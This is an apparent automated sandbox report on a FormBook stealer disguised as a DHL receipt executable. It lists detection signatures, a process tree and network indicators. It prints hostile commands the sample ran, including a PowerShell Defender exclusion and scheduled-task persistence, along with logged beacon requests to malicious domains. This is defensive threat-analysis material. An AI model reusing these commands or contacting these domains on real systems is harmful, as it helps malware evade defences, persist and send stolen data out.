Edit tour

Windows Analysis Report
DHL AWB Receipt_pdf.bat.exe

Overview

General Information

Sample name:	DHL AWB Receipt_pdf.bat.exe
Analysis ID:	1631024
MD5:	7b97dd6412ca78016694d3648151ee7d
SHA1:	a9a5901c2fd3ddf280e23628edb1389682fb71dc
SHA256:	f53311af739ec974405d290baaf24e14f06f6ebd9176bc716fee384777907b34
Tags:	exeFormbookuser-James_inthe_box
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

PE file contains section with special chars

PE file has nameless sections

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

DHL AWB Receipt_pdf.bat.exe (PID: 2272 cmdline: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe" MD5: 7B97DD6412CA78016694D3648151EE7D)

powershell.exe (PID: 6476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5360 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5624 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp44DF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 3504 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

V7C903J7TTVs.exe (PID: 2520 cmdline: "C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\R4CDpY41Xf.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

EhStorAuthn.exe (PID: 6780 cmdline: "C:\Windows\SysWOW64\EhStorAuthn.exe" MD5: 0C9245FDD67B14B9E7FBEBB88C3A5E7F)

V7C903J7TTVs.exe (PID: 2724 cmdline: "C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\8PPWvwAizlwE.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 2272 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

nlvpnyUnaRqfA.exe (PID: 6764 cmdline: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe MD5: 7B97DD6412CA78016694D3648151EE7D)

schtasks.exe (PID: 5432 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp26E1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 4676 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000011.00000002.4573592974.0000000000190000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.4575252245.00000000040A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2351320245.0000000001900000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.4577146791.00000000057D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.4575297734.00000000040F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2349664896.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.4575057978.0000000004B90000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2354807978.0000000003C70000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: nlvpnyUnaRqfA.exe PID: 6764	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 2272, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 6476, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp26E1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp26E1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe, ParentImage: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe, ParentProcessId: 6764, ParentProcessName: nlvpnyUnaRqfA.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp26E1.tmp", ProcessId: 5432, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp44DF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp44DF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 2272, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp44DF.tmp", ProcessId: 5624, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 2272, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 6476, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp44DF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp44DF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 2272, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp44DF.tmp", ProcessId: 5624, ProcessName: schtasks.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.publicblockchain.xyz/lp5v/?spy=cNV04zyxHZZ&XHUtU=7yIrJbTkKXcZ3P0KGr/Koo24hNJO/SgHVLeScBlqQKklxLvgBpJLKramFPJZQILeALwCbIGrsNSTHBUkDfJ2FkJN9qB3VnlreG336VlsRFxuGNUJREHaslKquVMcUYYxhA==

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe

ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: DHL AWB Receipt_pdf.bat.exe	ReversingLabs: Detection: 47%
Source: DHL AWB Receipt_pdf.bat.exe	Virustotal: Detection: 51%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.4573592974.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4575252245.00000000040A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2351320245.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4577146791.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4575297734.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2349664896.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4575057978.0000000004B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2354807978.0000000003C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: EhStorAuthn.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2350440474.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000010.00000003.2659580801.0000000001124000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000004A3C000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4574054013.000000000261A000.00000004.00000020.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000000.2426576148.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2646108935.00000000236DC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.2352110255.0000000001960000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000003.2352851312.000000000425E000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000003.2349934787.00000000040A8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4575534812.00000000045AE000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4575534812.0000000004410000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.2352110255.0000000001960000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000003.2352851312.000000000425E000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000003.2349934787.00000000040A8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4575534812.00000000045AE000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4575534812.0000000004410000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 00000009.00000002.2350440474.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000010.00000003.2659580801.0000000001124000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000004A3C000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4574054013.000000000261A000.00000004.00000020.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000000.2426576148.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2646108935.00000000236DC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: V7C903J7TTVs.exe, 00000010.00000000.2271366936.0000000000F0F000.00000002.00000001.01000000.0000000E.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4573978113.0000000000F0F000.00000002.00000001.01000000.0000000E.sdmp

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_016C1B30
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_016C1ADC
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	10_2_01811B30
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	10_2_01811A28
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 4x nop then push dword ptr [ebp-20h]	10_2_08B6EDD8
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	10_2_08B6EDD8
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	10_2_08B6D0D4
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	10_2_08B6EC5D
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 4x nop then push dword ptr [ebp-20h]	10_2_08B6EDCC
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	10_2_08B6EDCC
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 4x nop then push dword ptr [ebp-24h]	10_2_08B6F0F8
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	10_2_08B6F0F8
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 4x nop then push dword ptr [ebp-24h]	10_2_08B6F0ED
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	10_2_08B6F0ED
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 4x nop then xor edx, edx	10_2_08B6F030
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 4x nop then xor edx, edx	10_2_08B6F025

Networking

Performs DNS queries to domains with low reputation

Source:	DNS query: www.031233435.xyz
Source:	DNS query: www.publicblockchain.xyz
Source:	DNS query: www.multo.xyz
Source:	DNS query: www.usastakes.xyz

Source: global traffic

TCP traffic: 192.168.2.5:56594 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 144.76.229.203 144.76.229.203
Source: Joe Sandbox View	IP Address: 23.29.115.2 23.29.115.2

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wuv4/?XHUtU=2OIhpue752EZ90/IvIOXIVPMrLw233bVQ3MPFxfgDOdW1S8/arxwgjd2lghQxPvp+gghQveeWAHTWLXRjOMCRNuXwDr216DBxJqwrztqafm0gN7GWo7wazhUvMW/D9sNzA==&spy=cNV04zyxHZZ HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.loonerverse.appUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /esw3/?XHUtU=STIHOi9CYFClakjV40da904kxu04fSTg15TVg9rRTe6RIWG0ngBkAmIpkbb4lCp8vZ5PbVNvG6nxo4giTwSjTWldf3EKfrFwCElolvucyT5INFTCRjeylmDK6mihpn7uUQ==&spy=cNV04zyxHZZ HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.primepath.netUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /frae/?spy=cNV04zyxHZZ&XHUtU=KcpF0TU1XcHay6iLVQUXGDReeie9um98isUAx1G3kizVKrvyU48KAqtS1EQtSF28ARfeHCcJEKKBEr6rT3kku1OzbK5yiK6noV5aH1cMop/1tMHAh9Rfx/ZornT1cvdxLg== HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.031233435.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /19my/?XHUtU=joqcG+fZarPVQJ7S+4ZxvY2vtL9RD/Utjvk256BrCJs1qxhBI0rorZURoJn8TQLNAH2gxgdx7fps/CVRzREwfPP0r8vHEjg0J00zP6qmwy5/OKoRIycWhPpqQdbWJej8Uw==&spy=cNV04zyxHZZ HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.quo1ybjmkhdqljoz.topUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /lp5v/?spy=cNV04zyxHZZ&XHUtU=7yIrJbTkKXcZ3P0KGr/Koo24hNJO/SgHVLeScBlqQKklxLvgBpJLKramFPJZQILeALwCbIGrsNSTHBUkDfJ2FkJN9qB3VnlreG336VlsRFxuGNUJREHaslKquVMcUYYxhA== HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.publicblockchain.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /piuf/?XHUtU=YCNZp8d5iXit/W0AorWaWt7d4xAAmtdp36jPY/C6OJXNmYBtndpnLj0XSaiYBStqm/SDNtVWLS5HnYm1prURu2gkZni0KV25495YYQVjjOAmXfWkpHxpYmfFMe+ykUCf6A==&spy=cNV04zyxHZZ HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.multo.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ty1w/?spy=cNV04zyxHZZ&XHUtU=DmU+BbsPdbeZ2oth7eqVH4IxkOLk6Zp/22nZgrH0plfMc3nD0zI48kMWd79FMLpDsXRjkkg28/qOhccmO28DKB7uL0+Vw2px/OOdkCjvCA4RBa4gXyq2/Cl2LwjArqGdZw== HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.tkloqr.infoUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /acnz/?XHUtU=4AOqIRL3pTX0nNGi+lOPSRSyx/iWc+VNgOr/RdoxqxyE7WxJ0cGBT5xqcnG7h+9L/Gcmqaxm6woK1RcVOdtmlygepuDbgjx8TrlAGHAV/0a3Ooi8Z9K5OsEAJsLCu/irBQ==&spy=cNV04zyxHZZ HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.streaay.liveUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /qnz1/?spy=cNV04zyxHZZ&XHUtU=R+Oteo3rh3f7nhB2gSiRNKBizK43zE0qallxSves6Vu4hZ6h0oWNPYtUeAXf+7K/BC0XOkjfNAq1UFaiNKAvUuxTTHBcMTuCJqSn7igyXIXCBr+LpjPOdBGcjRnmk/kZJw== HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.77zhibo.netUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
